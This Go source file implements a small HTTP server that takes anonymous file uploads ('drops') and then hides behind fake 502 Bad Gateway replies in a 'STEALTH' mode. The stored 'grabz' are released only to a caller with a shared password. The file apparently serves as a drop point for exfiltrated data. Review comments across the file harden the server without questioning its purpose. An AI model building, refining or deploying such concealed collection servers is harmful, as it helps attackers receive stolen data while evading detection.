package main
import (
	"bytes"
	"crypto/subtle"
	"fmt"
	"io"
	"io/ioutil"
	"log"
	"net/http"
	"os"
	"strings"
	"time"

	"github.com/gorilla/mux"
	"github.com/urfave/negroni"
)
// Listener address. The server binds to the loopback interface only, so it is
// reachable from the local host (or through whatever forwards to it).
const (
	INTERFACE = "127.0.0.1"
	PORT      = "8000"
	SERVER    = INTERFACE + ":" + PORT
)

// On-disk layout. Both paths are relative, so they resolve against the
// working directory of the process.
const (
	DUMP     = "dump/"    // directory the previous drop file is moved into
	FILENAME = "drop.txt" // name the most recent upload is stored under
)

var (
	// PASSWD is the shared secret the GET handlers compare against the
	// "passwd" query parameter. It is read once, at package initialisation,
	// from the CH_PASSWD environment variable.
	PASSWD = os.Getenv("CH_PASSWD")

	// STEALTH selects which handlers answer: showGrabz and startServer act
	// only while it is true, recvDrop and stopServer only while it is false.
	//
	// NOTE(review): the handlers read and write this variable with no
	// synchronisation, and net/http serves each request on its own goroutine,
	// so concurrent requests race on it. Consider sync/atomic or a mutex.
	STEALTH = false
)
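// showGrabz handles GET /. While STEALTH is set it returns the stored drop
// file to a caller that presents the shared password; in every other state it
// answers 502 Bad Gateway.
func showGrabz(w http.ResponseWriter, r *http.Request) {
	if !STEALTH {
		http.Error(w, "Bad Gateway", http.StatusBadGateway)
		return
	}

	// NOTE(review): the secret travels in the URL query string, where it is
	// prone to ending up in access logs, proxies and browser history. The
	// parameter is kept for compatibility; a request header would be safer.
	passwd := r.URL.Query().Get("passwd")

	// Compare in constant time so response timing does not reveal how much of
	// the guess matched (ConstantTimeCompare still returns early on a length
	// mismatch). An empty configured secret is rejected outright.
	if PASSWD == "" || subtle.ConstantTimeCompare([]byte(passwd), []byte(PASSWD)) != 1 {
		http.Error(w, "Unauthorized", http.StatusUnauthorized)
		return
	}

	content, err := ioutil.ReadFile(FILENAME) // resolved against the working directory
	if err != nil {
		fmt.Println("[^] No data do send")
		// Report the failure instead of replying 200 with an empty body.
		if os.IsNotExist(err) {
			http.Error(w, "Not Found", http.StatusNotFound)
		} else {
			http.Error(w, "Internal Server Error", http.StatusInternalServerError)
		}
		return
	}

	// Log the size only: echoing the payload would copy the stored data into
	// the process output as well.
	fmt.Printf("[^] Sending data: %d bytes\n", len(content))

	// The file was supplied by an unauthenticated uploader. Without an explicit
	// type net/http sniffs the body and may label it text/html, which a browser
	// would then render; pin it to plain text and disable sniffing.
	w.Header().Set("Content-Type", "text/plain; charset=utf-8")
	w.Header().Set("X-Content-Type-Options", "nosniff")
	if _, err := w.Write(content); err != nil {
		fmt.Printf("[^] Write failed: %v\n", err)
	}
}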
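// recvDrop handles POST /. While STEALTH is clear it accepts a multipart
// upload in the form field "data", moves any existing drop file into DUMP,
// stores the upload as FILENAME, sets STEALTH and answers 502 Bad Gateway
// (the original author calls this a "false signal"). While STEALTH is set it
// answers 502 without reading the body.
//
// No credential is checked on this path: any client that can reach the
// listener can replace the drop file and flip STEALTH.
func recvDrop(w http.ResponseWriter, r *http.Request) {
	if STEALTH {
		http.Error(w, "Bad Gateway", http.StatusBadGateway)
		return
	}

	// fail logs the cause locally and sends only a generic status to the client.
	fail := func(status int, what string, err error) {
		log.Printf("[!] %s: %v", what, err)
		http.Error(w, http.StatusText(status), status)
	}

	// ParseMultipartForm's argument bounds only what is kept in memory; the
	// remainder spills to temporary files. Cap the whole request body too, so
	// an unauthenticated client cannot fill the disk.
	const maxUpload = 32 << 20
	r.Body = http.MaxBytesReader(w, r.Body, maxUpload)
	if err := r.ParseMultipartForm(maxUpload); err != nil {
		fail(http.StatusBadRequest, "parsing upload", err)
		return
	}
	defer r.MultipartForm.RemoveAll() // drop any temp files the parser created

	fp, header, err := r.FormFile("data")
	if err != nil {
		// A missing field is a client error, not a reason to panic.
		fail(http.StatusBadRequest, "reading form field \"data\"", err)
		return
	}
	defer fp.Close()

	// %q keeps control characters in the client-chosen name out of the log.
	fmt.Printf("[+] Received file: %q\n", header.Filename)

	var buf bytes.Buffer
	if _, err := io.Copy(&buf, fp); err != nil {
		fail(http.StatusInternalServerError, "buffering upload", err)
		return
	}

	if err := os.MkdirAll(DUMP, 0770); err != nil {
		fail(http.StatusInternalServerError, "creating dump directory", err)
		return
	}

	// As in the original, the archived copy of the previous drop takes its
	// extension from the second dot-separated part of the new upload's name.
	// That value is client-controlled, so it is used only when it is a short
	// alphanumeric token; otherwise (or when the name has no dot) "txt" is used.
	ext := "txt"
	if parts := strings.Split(header.Filename, "."); len(parts) > 1 && safeArchiveExt(parts[1]) {
		ext = parts[1]
	}

	if _, err := os.Stat(FILENAME); err == nil {
		// A fixed layout avoids the spaces, colons and monotonic-clock suffix
		// that time.Time.String() would put into the file name.
		stamp := time.Now().UTC().Format("20060102T150405.000000000Z")
		archived := DUMP + strings.Split(FILENAME, ".")[0] + "-" + stamp + "." + ext
		if err := os.Rename(FILENAME, archived); err != nil {
			// Stop here: creating FILENAME now would truncate the old drop.
			fail(http.StatusInternalServerError, "archiving previous drop", err)
			return
		}
	}

	fptr, err := os.Create(FILENAME)
	if err != nil {
		// log.Fatal here would let a single request terminate the server.
		fail(http.StatusInternalServerError, "creating drop file", err)
		return
	}
	// Write the raw bytes; iterating the data as runes would replace any
	// invalid UTF-8 sequence with U+FFFD and corrupt the stored file.
	if _, err := fptr.Write(buf.Bytes()); err != nil {
		fptr.Close()
		fail(http.StatusInternalServerError, "writing drop file", err)
		return
	}
	if err := fptr.Close(); err != nil {
		fail(http.StatusInternalServerError, "closing drop file", err)
		return
	}

	// Only a fully stored upload switches the server into STEALTH mode.
	STEALTH = true
	http.Error(w, "Bad Gateway", http.StatusBadGateway)
}

// safeArchiveExt reports whether s is 1 to 16 ASCII letters or digits, i.e.
// safe to append to a file name as an extension.
func safeArchiveExt(s string) bool {
	if s == "" || len(s) > 16 {
		return false
	}
	for i := 0; i < len(s); i++ {
		c := s[i]
		switch {
		case c >= 'a' && c <= 'z', c >= 'A' && c <= 'Z', c >= '0' && c <= '9':
		default:
			return false
		}
	}
	return true
}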
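// startServer handles GET /start. While STEALTH is set, a caller presenting
// the shared password clears it, which re-enables recvDrop and stopServer.
// While STEALTH is clear it answers 502 Bad Gateway.
func startServer(w http.ResponseWriter, r *http.Request) {
	if !STEALTH {
		http.Error(w, "Bad Gateway", http.StatusBadGateway)
		return
	}

	// NOTE(review): this is a state-changing GET authenticated by a query
	// parameter; the secret is prone to ending up in access logs and browser
	// history. Kept for compatibility with existing clients.
	passwd := r.URL.Query().Get("passwd")

	// Constant-time comparison so response timing does not reveal how much of
	// the guess matched; an empty configured secret never authenticates.
	if PASSWD == "" || subtle.ConstantTimeCompare([]byte(passwd), []byte(PASSWD)) != 1 {
		http.Error(w, "Unauthorized", http.StatusUnauthorized)
		return
	}

	fmt.Fprintf(w, "Server started at %s\n", time.Now().String())
	STEALTH = false
}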
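// stopServer handles GET /stop. While STEALTH is clear, a caller presenting
// the shared password sets it, which disables recvDrop and enables showGrabz
// and startServer. While STEALTH is already set it answers 502 Bad Gateway.
func stopServer(w http.ResponseWriter, r *http.Request) {
	if STEALTH {
		http.Error(w, "Bad Gateway", http.StatusBadGateway)
		return
	}

	// NOTE(review): this is a state-changing GET authenticated by a query
	// parameter; the secret is prone to ending up in access logs and browser
	// history. Kept for compatibility with existing clients.
	passwd := r.URL.Query().Get("passwd")

	// Constant-time comparison so response timing does not reveal how much of
	// the guess matched; an empty configured secret never authenticates.
	if PASSWD == "" || subtle.ConstantTimeCompare([]byte(passwd), []byte(PASSWD)) != 1 {
		http.Error(w, "Unauthorized", http.StatusUnauthorized)
		return
	}

	fmt.Fprintf(w, "Server stopped at %s\n", time.Now().String())
	STEALTH = true
}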
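// main refuses to start without CH_PASSWD, registers the four routes and
// serves them on SERVER until the listener fails.
//
// The process stays in the foreground. Per the original author's note, a
// separate Python script is needed to daemonise it and send its log to a file.
func main() {
	if PASSWD == "" {
		fmt.Println("Error environmental variable CH_PASSWD not set")
		// Exit non-zero so a supervisor or wrapper script sees the failure.
		os.Exit(1)
	}

	r := mux.NewRouter()
	r.HandleFunc("/", showGrabz).Methods("GET")
	r.HandleFunc("/", recvDrop).Methods("POST")
	r.HandleFunc("/start", startServer).Methods("GET")
	r.HandleFunc("/stop", stopServer).Methods("GET")

	// NOTE(review): negroni.Classic bundles panic recovery, request logging and
	// static file serving; confirm the static handler (it serves a "public"
	// directory) is intended, since it sits outside the password checks.
	n := negroni.Classic()
	n.UseHandler(r)

	srv := &http.Server{
		Addr:    SERVER,
		Handler: n,
		// Bound how long a client may take to send its request headers.
		ReadHeaderTimeout: 10 * time.Second,
	}
	// ListenAndServe only returns on failure (for example, port already in
	// use); report it rather than exiting silently with status 0.
	log.Fatal(srv.ListenAndServe())
}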